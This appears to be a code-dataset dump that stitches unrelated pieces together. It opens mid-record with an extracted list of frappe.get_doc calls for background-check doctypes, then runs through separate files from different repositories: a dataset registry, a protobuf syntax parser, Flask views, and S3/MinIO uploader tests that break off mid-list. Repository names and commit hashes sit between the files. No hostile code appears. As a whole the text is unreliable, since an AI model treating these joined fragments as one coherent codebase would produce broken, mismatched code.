Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check2', {'applicant_id': app.ref_id})\n", (5345, 5393), False, 'import frappe\n'), ((5805, 
5867), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check3', {'applicant_id': app.ref_id})\n", (5819, 5867), False, 'import frappe\n'), ((6279, 6341), 'frappe.get_doc', 'frappe.get_doc', (['"""Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Address Check4', {'applicant_id': app.ref_id})\n", (6293, 6341), False, 'import frappe\n'), ((6752, 6813), 'frappe.get_doc', 'frappe.get_doc', (['"""Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Family Check1', {'applicant_id': app.ref_id})\n", (6766, 6813), False, 'import frappe\n'), ((7226, 7290), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check1', {'applicant_id': app.ref_id})\n", (7240, 7290), False, 'import frappe\n'), ((7706, 7770), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check2', {'applicant_id': app.ref_id})\n", (7720, 7770), False, 'import frappe\n'), ((8186, 8250), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check3', {'applicant_id': app.ref_id})\n", (8200, 8250), False, 'import frappe\n'), ((8666, 8730), 'frappe.get_doc', 'frappe.get_doc', (['"""Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Reference Check4', {'applicant_id': app.ref_id})\n", (8680, 8730), False, 'import frappe\n'), ((9141, 9200), 'frappe.get_doc', 'frappe.get_doc', (['"""Civil Check"""', "{'applicant_id': app.ref_id}"], {}), "('Civil Check', {'applicant_id': app.ref_id})\n", (9155, 9200), False, 'import frappe\n'), ((9609, 9671), 'frappe.get_doc', 'frappe.get_doc', (['"""Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Criminal Check', {'applicant_id': app.ref_id})\n", (9623, 9671), False, 'import frappe\n'), ((10078, 10135), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check1', {'applicant_id': app.ref_id})\n", (10092, 10135), False, 'import frappe\n'), ((10537, 10594), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check2', {'applicant_id': app.ref_id})\n", (10551, 10594), False, 'import frappe\n'), ((10996, 11053), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check3', {'applicant_id': app.ref_id})\n", (11010, 11053), False, 'import frappe\n'), ((11455, 11512), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check4', {'applicant_id': app.ref_id})\n", (11469, 11512), False, 'import frappe\n'), ((11914, 11971), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check5', {'applicant_id': app.ref_id})\n", (11928, 11971), False, 'import frappe\n'), ((12373, 12430), 'frappe.get_doc', 'frappe.get_doc', (['"""ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('ID Check6', {'applicant_id': app.ref_id})\n", (12387, 12430), False, 'import frappe\n'), ((1097, 1169), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check1', {'applicant_id': app.ref_id})\n", (1111, 1169), False, 'import frappe\n'), ((1580, 1652), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check2', {'applicant_id': app.ref_id})\n", (1594, 1652), False, 
'import frappe\n'), ((2063, 2135), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check3', {'applicant_id': app.ref_id})\n", (2077, 2135), False, 'import frappe\n'), ((2546, 2618), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Employment Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Employment Check4', {'applicant_id': app.ref_id})\n", (2560, 2618), False, 'import frappe\n'), ((2911, 2975), 'frappe.get_doc', 'frappe.get_doc', (['"""Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Education Check1', {'applicant_id': app.ref_id})\n", (2925, 2975), False, 'import frappe\n'), ((3651, 3722), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check2', {'applicant_id': app.ref_id})\n", (3665, 3722), False, 'import frappe\n'), ((4131, 4202), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check3', {'applicant_id': app.ref_id})\n", (4145, 4202), False, 'import frappe\n'), ((4611, 4682), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check4', {'applicant_id': app.ref_id})\n", (4625, 4682), False, 'import frappe\n'), ((5087, 5156), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check1', {'applicant_id': app.ref_id})\n", (5101, 5156), False, 'import frappe\n'), ((5561, 5630), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check2', {'applicant_id': app.ref_id})\n", (5575, 5630), False, 'import frappe\n'), ((6035, 6104), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check3', {'applicant_id': app.ref_id})\n", (6049, 6104), False, 'import frappe\n'), ((6509, 6578), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Address Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Address Check4', {'applicant_id': app.ref_id})\n", (6523, 6578), False, 'import frappe\n'), ((6981, 7049), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Family Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Family Check1', {'applicant_id': app.ref_id})\n", (6995, 7049), False, 'import frappe\n'), ((7458, 7529), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check1', {'applicant_id': app.ref_id})\n", (7472, 7529), False, 'import frappe\n'), ((7938, 8009), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check2', {'applicant_id': app.ref_id})\n", (7952, 8009), False, 'import frappe\n'), ((8418, 8489), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check3', {'applicant_id': app.ref_id})\n", (8432, 8489), False, 'import frappe\n'), ((8898, 8969), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Reference Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Reference Check4', {'applicant_id': app.ref_id})\n", (8912, 8969), False, 'import frappe\n'), ((9368, 9434), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Civil Check"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Civil Check', 
{'applicant_id': app.ref_id})\n", (9382, 9434), False, 'import frappe\n'), ((9839, 9908), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Criminal Check"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Criminal Check', {'applicant_id': app.ref_id})\n", (9853, 9908), False, 'import frappe\n'), ((10303, 10367), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check1', {'applicant_id': app.ref_id})\n", (10317, 10367), False, 'import frappe\n'), ((10762, 10826), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check2"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check2', {'applicant_id': app.ref_id})\n", (10776, 10826), False, 'import frappe\n'), ((11221, 11285), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check3"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check3', {'applicant_id': app.ref_id})\n", (11235, 11285), False, 'import frappe\n'), ((11680, 11744), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check4"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check4', {'applicant_id': app.ref_id})\n", (11694, 11744), False, 'import frappe\n'), ((12139, 12203), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check5"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check5', {'applicant_id': app.ref_id})\n", (12153, 12203), False, 'import frappe\n'), ((12598, 12662), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify ID Check6"""', "{'applicant_id': app.ref_id}"], {}), "('Verify ID Check6', {'applicant_id': app.ref_id})\n", (12612, 12662), False, 'import frappe\n'), ((3163, 3234), 'frappe.get_doc', 'frappe.get_doc', (['"""Verify Education Check1"""', "{'applicant_id': app.ref_id}"], {}), "('Verify Education Check1', {'applicant_id': app.ref_id})\n", (3177, 3234), False, 'import frappe\n')]
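A hedged refactoring sketch, not code from the repository above: every check column in this report repeats the same three-step lookup (skip if the check is disabled, read the check doctype, fall back to the matching "Verify ..." doctype once allocation is completed). The helper name check_status and the idea of deriving the verify doctype by prefixing "Verify " are assumptions for illustration; the education_check1 branch in the original additionally guards with frappe.db.exists, which is omitted here.

import frappe

def check_status(cg, flag_field, doctype, applicant_id):
    # Return '-' when this check is not enabled in the checks group.
    if not cg.get(flag_field):
        return "-"
    check = frappe.get_doc(doctype, {"applicant_id": applicant_id})
    if check.status != "Allocation Completed":
        return check.status
    verified = frappe.get_doc("Verify " + doctype, {"applicant_id": applicant_id})
    return verified.status

# Illustrative use inside execute(), mirroring the first two columns:
# row += [check_status(cg, "employment_check1", "Employment Check1", app.ref_id)]
# row += [check_status(cg, "employment_check2", "Employment Check2", app.ref_id)]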
TeamOfProfGuo/few_shot_baseline
dataset/dataset.py
f9ac87b9d309fc417589350d3ce61d3612e2be91
import os

DEFAULT_ROOT = './materials'

datasets_dt = {}


def register(name):
    def decorator(cls):
        datasets_dt[name] = cls
        return cls
    return decorator


def make(name, **kwargs):
    if kwargs.get('root_path') is None:
        kwargs['root_path'] = os.path.join(DEFAULT_ROOT, name)
    dataset = datasets_dt[name](**kwargs)
    return dataset
[((274, 306), 'os.path.join', 'os.path.join', (['DEFAULT_ROOT', 'name'], {}), '(DEFAULT_ROOT, name)\n', (286, 306), False, 'import os\n')]
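A short usage sketch, assumed rather than taken from the repository above, showing how the register/make registry is typically exercised: the import path, the 'mini-imagenet' name, and the MiniImageNet class are illustrative assumptions.

from dataset.dataset import register, make   # assumed import path given the repo layout

@register('mini-imagenet')
class MiniImageNet:
    def __init__(self, root_path, split='train'):
        self.root_path = root_path
        self.split = split

# root_path is filled in by make() as ./materials/mini-imagenet when not given.
ds = make('mini-imagenet', split='train')
print(ds.root_path)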
YiXiaoCuoHuaiFenZi/proto-formatter
src/proto_formatter/syntax_parser.py
ac8c913a8c3854e840aa4f015c026e58ee023b0b
from .comment import CommentParser
from .protobuf import Protobuf
from .proto_structures import Syntax


class SyntaxParser():

    @classmethod
    def parse_and_add(cls, proto_obj: Protobuf, line, top_comment_list):
        if proto_obj.syntax is not None:
            # a proto file may declare syntax only once
            raise ValueError('multiple syntax detected!')
        proto_obj.syntax = cls.parse_syntax(line, top_comment_list)

    @classmethod
    def parse_syntax(cls, line, top_comment_list):
        value = cls._get_syntax_value(line)
        comments = CommentParser.create_comment(line, top_comment_list)
        syntax = Syntax(value, comments)
        return syntax

    @classmethod
    def _get_syntax_value(cls, line):
        # strip spaces, then take everything between 'syntax=' and ';' without quotes
        line = line.strip().replace(' ', '')
        lindex = len('syntax=')
        rindex = line.index(';')
        value = line[lindex:rindex].strip().replace('"', "").replace("'", "")
        return value
[]
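An illustrative walk-through, assumed rather than taken from the repository above, of what _get_syntax_value extracts from a protobuf syntax declaration; the sample line is made up.

line = 'syntax = "proto3";'
stripped = line.strip().replace(' ', '')                  # 'syntax="proto3";'
value = stripped[len('syntax='):stripped.index(';')]     # '"proto3"'
value = value.replace('"', '').replace("'", '')          # 'proto3'
print(value)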
mgp-git/Flask
IPL/app/core/views.py
f56be0192a3aac550a1dae46394352a68bd53d3d
from flask import render_template, request, Blueprint

core = Blueprint('core', __name__)


@core.route("/", methods=['GET', 'POST'])
def home():
    return render_template('home.html')


@core.route("/about")
def about():
    return render_template('about.html')


@core.route('/search', methods=['GET', 'POST'])
def search():
    search_str = request.args.get('globalsearch')
    return render_template('search.html', search_str=search_str)
[((62, 89), 'flask.Blueprint', 'Blueprint', (['"""core"""', '__name__'], {}), "('core', __name__)\n", (71, 89), False, 'from flask import render_template, request, Blueprint\n'), ((157, 185), 'flask.render_template', 'render_template', (['"""home.html"""'], {}), "('home.html')\n", (172, 185), False, 'from flask import render_template, request, Blueprint\n'), ((234, 263), 'flask.render_template', 'render_template', (['"""about.html"""'], {}), "('about.html')\n", (249, 263), False, 'from flask import render_template, request, Blueprint\n'), ((345, 377), 'flask.request.args.get', 'request.args.get', (['"""globalsearch"""'], {}), "('globalsearch')\n", (361, 377), False, 'from flask import render_template, request, Blueprint\n'), ((389, 442), 'flask.render_template', 'render_template', (['"""search.html"""'], {'search_str': 'search_str'}), "('search.html', search_str=search_str)\n", (404, 442), False, 'from flask import render_template, request, Blueprint\n')]
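A minimal wiring sketch, assumed rather than taken from the repository above, showing how the core blueprint would normally be attached to a Flask application; the app.core.views import path follows the repo_path shown, while the rest of the application layout is an assumption.

from flask import Flask
from app.core.views import core   # assumed import path

app = Flask(__name__)
app.register_blueprint(core)

if __name__ == '__main__':
    app.run(debug=True)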
tdilauro/circulation-core
tests/test_s3.py
8086ca8cbedd5f4b2a0c44df97889d078ff79aac
# encoding: utf-8 import functools import os from urllib.parse import urlsplit import boto3 import botocore import pytest from botocore.exceptions import BotoCoreError, ClientError from mock import MagicMock from parameterized import parameterized from ..mirror import MirrorUploader from ..model import ( DataSource, ExternalIntegration, Hyperlink, Identifier, Representation, create, ) from ..s3 import ( MinIOUploader, MinIOUploaderConfiguration, MockS3Client, MultipartS3Upload, S3AddressingStyle, S3Uploader, S3UploaderConfiguration, ) from ..testing import DatabaseTest from ..util.datetime_helpers import datetime_utc, utc_now class S3UploaderTest(DatabaseTest): def _integration(self, **settings): """Create and configure a simple S3 integration.""" integration = self._external_integration( ExternalIntegration.S3, ExternalIntegration.STORAGE_GOAL, settings=settings ) integration.username = settings.get("username", "username") integration.password = settings.get("password", "password") return integration def _add_settings_value(self, settings, key, value): """Adds a value to settings dictionary :param settings: Settings dictionary :type settings: Dict :param key: Key :type key: string :param value: Value :type value: Any :return: Updated settings dictionary :rtype: Dict """ if value: if settings: settings[key] = value else: settings = {key: value} return settings def _create_s3_uploader( self, client_class=None, uploader_class=None, region=None, addressing_style=None, **settings ): """Creates a new instance of S3 uploader :param client_class: (Optional) Custom class to be used instead of boto3's client class :type client_class: Optional[Type] :param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader :type uploader_class: Optional[Type] :param region: (Optional) S3 region :type region: Optional[string] :param addressing_style: (Optional) S3 addressing style :type addressing_style: Optional[string] :param settings: Kwargs used for initializing an external integration :type: Optional[Dict] :return: New intance of S3 uploader :rtype: S3Uploader """ settings = self._add_settings_value( settings, S3UploaderConfiguration.S3_REGION, region ) settings = self._add_settings_value( settings, S3UploaderConfiguration.S3_ADDRESSING_STYLE, addressing_style ) integration = self._integration(**settings) uploader_class = uploader_class or S3Uploader return uploader_class(integration, client_class=client_class) class S3UploaderIntegrationTest(S3UploaderTest): SIMPLIFIED_TEST_MINIO_ENDPOINT_URL = os.environ.get( "SIMPLIFIED_TEST_MINIO_ENDPOINT_URL", "http://localhost:9000" ) SIMPLIFIED_TEST_MINIO_USER = os.environ.get( "SIMPLIFIED_TEST_MINIO_USER", "minioadmin" ) SIMPLIFIED_TEST_MINIO_PASSWORD = os.environ.get( "SIMPLIFIED_TEST_MINIO_PASSWORD", "minioadmin" ) _, SIMPLIFIED_TEST_MINIO_HOST, _, _, _ = urlsplit( SIMPLIFIED_TEST_MINIO_ENDPOINT_URL ) minio_s3_client = None """boto3 client connected to locally running MinIO instance""" s3_client_class = None """Factory function used for creating a boto3 client inside S3Uploader""" @classmethod def setup_class(cls): """Initializes the test suite by creating a boto3 client set up with MinIO credentials""" super(S3UploaderIntegrationTest, cls).setup_class() cls.minio_s3_client = boto3.client( "s3", aws_access_key_id=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_USER, aws_secret_access_key=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_PASSWORD, endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL, ) cls.s3_client_class 
= functools.partial( boto3.client, endpoint_url=TestS3UploaderIntegration.SIMPLIFIED_TEST_MINIO_ENDPOINT_URL, ) def teardown_method(self): """Deinitializes the test suite by removing all the buckets from MinIO""" super(S3UploaderTest, self).teardown_method() response = self.minio_s3_client.list_buckets() for bucket in response["Buckets"]: bucket_name = bucket["Name"] response = self.minio_s3_client.list_objects(Bucket=bucket_name) for object in response.get("Contents", []): object_key = object["Key"] self.minio_s3_client.delete_object(Bucket=bucket_name, Key=object_key) self.minio_s3_client.delete_bucket(Bucket=bucket_name) def _create_s3_uploader( self, client_class=None, uploader_class=None, region=None, addressing_style=None, **settings ): """Creates a new instance of S3 uploader :param client_class: (Optional) Custom class to be used instead of boto3's client class :type client_class: Optional[Type] :param: uploader_class: (Optional) Custom class which will be used insted of S3Uploader :type uploader_class: Optional[Type] :param region: (Optional) S3 region :type region: Optional[string] :param addressing_style: (Optional) S3 addressing style :type addressing_style: Optional[string] :param settings: Kwargs used for initializing an external integration :type: Optional[Dict] :return: New intance of S3 uploader :rtype: S3Uploader """ if settings and "username" not in settings: self._add_settings_value( settings, "username", self.SIMPLIFIED_TEST_MINIO_USER ) if settings and "password" not in settings: self._add_settings_value( settings, "password", self.SIMPLIFIED_TEST_MINIO_PASSWORD ) if not client_class: client_class = self.s3_client_class return super(S3UploaderIntegrationTest, self)._create_s3_uploader( client_class, uploader_class, region, addressing_style, **settings ) class TestS3Uploader(S3UploaderTest): def test_names(self): # The NAME associated with this class must be the same as its # key in the MirrorUploader implementation registry, and it's # better if it's the same as the name of the external # integration. assert S3Uploader.NAME == ExternalIntegration.S3 assert ( S3Uploader == MirrorUploader.IMPLEMENTATION_REGISTRY[ExternalIntegration.S3] ) def test_instantiation(self): integration = self._external_integration( ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL ) integration.username = "your-access-key" integration.password = "your-secret-key" integration.setting( S3UploaderConfiguration.URL_TEMPLATE_KEY ).value = "a transform" uploader = MirrorUploader.implementation(integration) assert True == isinstance(uploader, S3Uploader) # The URL_TEMPLATE_KEY setting becomes the .url_transform # attribute on the S3Uploader object. 
assert "a transform" == uploader.url_transform @parameterized.expand( [ ("empty_credentials", None, None), ("empty_string_credentials", "", ""), ("non_empty_string_credentials", "username", "password"), ] ) def test_initialization(self, name, username, password): # Arrange settings = {"username": username, "password": password} integration = self._external_integration( ExternalIntegration.S3, goal=ExternalIntegration.STORAGE_GOAL, settings=settings, ) client_class = MagicMock() # Act S3Uploader(integration, client_class=client_class) # Assert assert client_class.call_count == 2 service_name = client_class.call_args_list[0].args[0] region_name = client_class.call_args_list[0].kwargs["region_name"] aws_access_key_id = client_class.call_args_list[0].kwargs["aws_access_key_id"] aws_secret_access_key = client_class.call_args_list[0].kwargs[ "aws_secret_access_key" ] config = client_class.call_args_list[0].kwargs["config"] assert service_name == "s3" assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION assert aws_access_key_id == None assert aws_secret_access_key == None assert config.signature_version == botocore.UNSIGNED assert ( config.s3["addressing_style"] == S3UploaderConfiguration.S3_DEFAULT_ADDRESSING_STYLE ) service_name = client_class.call_args_list[1].args[0] region_name = client_class.call_args_list[1].kwargs["region_name"] aws_access_key_id = client_class.call_args_list[1].kwargs["aws_access_key_id"] aws_secret_access_key = client_class.call_args_list[1].kwargs[ "aws_secret_access_key" ] assert service_name == "s3" assert region_name == S3UploaderConfiguration.S3_DEFAULT_REGION assert aws_access_key_id == (username if username != "" else None) assert aws_secret_access_key == (password if password != "" else None) assert "config" not in client_class.call_args_list[1].kwargs def test_custom_client_class(self): """You can specify a client class to use instead of boto3.client.""" integration = self._integration() uploader = S3Uploader(integration, MockS3Client) assert isinstance(uploader.client, MockS3Client) def test_get_bucket(self): buckets = { S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "banana", S3UploaderConfiguration.BOOK_COVERS_BUCKET_KEY: "bucket", } buckets_plus_irrelevant_setting = dict(buckets) buckets_plus_irrelevant_setting["not-a-bucket-at-all"] = "value" uploader = self._create_s3_uploader(**buckets_plus_irrelevant_setting) # This S3Uploader knows about the configured buckets. It # wasn't informed of the irrelevant 'not-a-bucket-at-all' # setting. 
assert buckets == uploader.buckets # get_bucket just does a lookup in .buckets uploader.buckets["foo"] = object() result = uploader.get_bucket("foo") assert uploader.buckets["foo"] == result @parameterized.expand( [ ( "s3_url_with_path_without_slash", "a-bucket", "a-path", "https://a-bucket.s3.amazonaws.com/a-path", None, ), ( "s3_dummy_url_with_path_without_slash", "dummy", "dummy", "https://dummy.s3.amazonaws.com/dummy", None, ), ( "s3_path_style_url_with_path_without_slash", "a-bucket", "a-path", "https://s3.amazonaws.com/a-bucket/a-path", None, S3AddressingStyle.PATH.value, ), ( "s3_path_style_dummy_url_with_path_without_slash", "dummy", "dummy", "https://s3.amazonaws.com/dummy/dummy", None, S3AddressingStyle.PATH.value, ), ( "s3_url_with_path_with_slash", "a-bucket", "/a-path", "https://a-bucket.s3.amazonaws.com/a-path", None, ), ( "s3_path_style_url_with_path_with_slash", "a-bucket", "/a-path", "https://s3.amazonaws.com/a-bucket/a-path", None, S3AddressingStyle.PATH.value, ), ( "s3_url_with_custom_region_and_path_without_slash", "a-bucket", "a-path", "https://a-bucket.s3.us-east-2.amazonaws.com/a-path", "us-east-2", ), ( "s3_path_style_url_with_custom_region_and_path_without_slash", "a-bucket", "a-path", "https://s3.us-east-2.amazonaws.com/a-bucket/a-path", "us-east-2", S3AddressingStyle.PATH.value, ), ( "s3_url_with_custom_region_and_path_with_slash", "a-bucket", "/a-path", "https://a-bucket.s3.us-east-3.amazonaws.com/a-path", "us-east-3", ), ( "s3_path_style_url_with_custom_region_and_path_with_slash", "a-bucket", "/a-path", "https://s3.us-east-3.amazonaws.com/a-bucket/a-path", "us-east-3", S3AddressingStyle.PATH.value, ), ( "custom_http_url_and_path_without_slash", "http://a-bucket.com/", "a-path", "http://a-bucket.com/a-path", None, ), ( "custom_http_url_and_path_with_slash", "http://a-bucket.com/", "/a-path", "http://a-bucket.com/a-path", None, ), ( "custom_http_url_and_path_without_slash", "https://a-bucket.com/", "a-path", "https://a-bucket.com/a-path", None, ), ( "custom_http_url_and_path_with_slash", "https://a-bucket.com/", "/a-path", "https://a-bucket.com/a-path", None, ), ] ) def test_url( self, name, bucket, path, expected_result, region=None, addressing_style=None ): # Arrange uploader = self._create_s3_uploader( region=region, addressing_style=addressing_style ) # Act result = uploader.url(bucket, path) # Assert assert result == expected_result @parameterized.expand( [ ( "implicit_s3_url_template", "bucket", "the key", "https://bucket.s3.amazonaws.com/the%20key", ), ( "implicit_s3_url_template_with_custom_region", "bucket", "the key", "https://bucket.s3.us-east-2.amazonaws.com/the%20key", None, "us-east-2", ), ( "explicit_s3_url_template", "bucket", "the key", "https://bucket.s3.amazonaws.com/the%20key", S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, ), ( "explicit_s3_url_template_with_custom_region", "bucket", "the key", "https://bucket.s3.us-east-2.amazonaws.com/the%20key", S3UploaderConfiguration.URL_TEMPLATE_DEFAULT, "us-east-2", ), ( "http_url_template", "bucket", "the këy", "http://bucket/the%20k%C3%ABy", S3UploaderConfiguration.URL_TEMPLATE_HTTP, ), ( "https_url_template", "bucket", "the këy", "https://bucket/the%20k%C3%ABy", S3UploaderConfiguration.URL_TEMPLATE_HTTPS, ), ] ) def test_final_mirror_url( self, name, bucket, key, expected_result, url_transform=None, region=None ): # Arrange uploader = self._create_s3_uploader(region=region) if url_transform: uploader.url_transform = url_transform # Act result = uploader.final_mirror_url(bucket, key) # Assert if not 
url_transform: assert ( S3UploaderConfiguration.URL_TEMPLATE_DEFAULT == uploader.url_transform ) assert result == expected_result def test_key_join(self): """Test the code used to build S3 keys from parts.""" parts = ["Gutenberg", b"Gutenberg ID", 1234, "Die Flügelmaus+.epub"] assert ( "Gutenberg/Gutenberg%20ID/1234/Die%20Fl%C3%BCgelmaus%2B.epub" == S3Uploader.key_join(parts) ) @parameterized.expand( [ ( "with_gutenberg_cover_generator_data_source", "test-book-covers-s3-bucket", DataSource.GUTENBERG_COVER_GENERATOR, "https://test-book-covers-s3-bucket.s3.amazonaws.com/Gutenberg%20Illustrated/", ), ( "with_overdrive_data_source", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.amazonaws.com/Overdrive/", ), ( "with_overdrive_data_source_and_scaled_size", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.amazonaws.com/scaled/300/Overdrive/", 300, ), ( "with_gutenberg_cover_generator_data_source_and_custom_region", "test-book-covers-s3-bucket", DataSource.GUTENBERG_COVER_GENERATOR, "https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Gutenberg%20Illustrated/", None, "us-east-3", ), ( "with_overdrive_data_source_and_custom_region", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/Overdrive/", None, "us-east-3", ), ( "with_overdrive_data_source_and_scaled_size_and_custom_region", "test-book-covers-s3-bucket", DataSource.OVERDRIVE, "https://test-book-covers-s3-bucket.s3.us-east-3.amazonaws.com/scaled/300/Overdrive/", 300, "us-east-3", ), ] ) def test_cover_image_root( self, name, bucket, data_source_name, expected_result, scaled_size=None, region=None, ): # Arrange uploader = self._create_s3_uploader(region=region) data_source = DataSource.lookup(self._db, data_source_name) # Act result = uploader.cover_image_root(bucket, data_source, scaled_size=scaled_size) # Assert assert result == expected_result @parameterized.expand( [ ( "with_default_region", "test-open-access-s3-bucket", "https://test-open-access-s3-bucket.s3.amazonaws.com/", ), ( "with_custom_region", "test-open-access-s3-bucket", "https://test-open-access-s3-bucket.s3.us-east-3.amazonaws.com/", "us-east-3", ), ] ) def test_content_root(self, name, bucket, expected_result, region=None): # Arrange uploader = self._create_s3_uploader(region=region) # Act result = uploader.content_root(bucket) # Assert assert result == expected_result @parameterized.expand( [ ( "s3_url", "test-marc-s3-bucket", "SHORT", "https://test-marc-s3-bucket.s3.amazonaws.com/SHORT/", ), ( "s3_url_with_custom_region", "test-marc-s3-bucket", "SHORT", "https://test-marc-s3-bucket.s3.us-east-2.amazonaws.com/SHORT/", "us-east-2", ), ("custom_http_url", "http://my-feed/", "SHORT", "http://my-feed/SHORT/"), ("custom_https_url", "https://my-feed/", "SHORT", "https://my-feed/SHORT/"), ] ) def test_marc_file_root( self, name, bucket, library_name, expected_result, region=None ): # Arrange uploader = self._create_s3_uploader(region=region) library = self._library(short_name=library_name) # Act result = uploader.marc_file_root(bucket, library) # Assert assert result == expected_result @parameterized.expand( [ ( "with_identifier", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.epub", ), ( "with_custom_extension", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf", 
"pdf", ), ( "with_custom_dotted_extension", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK.pdf", ".pdf", ), ( "with_custom_data_source", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK.epub", None, DataSource.UNGLUE_IT, ), ( "with_custom_title", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/Gutenberg%20ID/ABOOK/On%20Books.epub", None, None, "On Books", ), ( "with_custom_extension_and_title_and_data_source", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf", ".pdf", DataSource.UNGLUE_IT, "On Books", ), ( "with_custom_extension_and_title_and_data_source_and_region", {S3UploaderConfiguration.OA_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", "https://thebooks.s3.us-east-3.amazonaws.com/unglue.it/Gutenberg%20ID/ABOOK/On%20Books.pdf", ".pdf", DataSource.UNGLUE_IT, "On Books", "us-east-3", ), ( "with_protected_access_and_custom_extension_and_title_and_data_source_and_region", {S3UploaderConfiguration.PROTECTED_CONTENT_BUCKET_KEY: "thebooks"}, "ABOOK", 